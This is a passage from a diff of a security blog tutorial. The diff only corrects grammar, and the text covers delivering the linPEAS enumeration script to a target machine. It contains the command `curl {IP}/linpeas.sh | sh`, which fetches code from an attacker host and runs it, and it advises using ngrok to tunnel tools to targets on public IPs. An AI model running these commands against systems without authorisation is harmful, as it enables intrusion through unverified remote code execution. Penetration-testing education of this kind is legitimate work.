CyberEthicalMe/blog-articles/ckos5ch390c3bbws15qzh85bq.md

 $ curl {IP}/linpeas.sh | sh
 ```

-If target machine have access to the internet and can access the linPEAS from GitHub - of course you can call it as previously.
+If the target machine has access to the internet and can access the linPEAS from GitHub - of course, you can call it as previously.

 ## Public network

-When you are targeting server via public IP, you cannot `curl` directly from your localhost, unless connection is tunneled via some external IP.
-The simplest way is combination of `ngrok` and Python server from the previous example.
+When you are targeting a server via public IP, you cannot `curl` directly from your localhost, unless the connection is tunneled via some external IP.
+The simplest way is the combination of `ngrok` and Python server from the previous example.

 > Download the executable from [the official site](https://ngrok.com/).
 You can find there also very informative manual.
 It is a very helpful application.
 One quick remark is that without registration `ngrok` allow creating time-limited HTTP/HTTPS tunnel to your host.
 When registered time limitation is lifted and `ngrok` can be used to create, for example, TCP connections.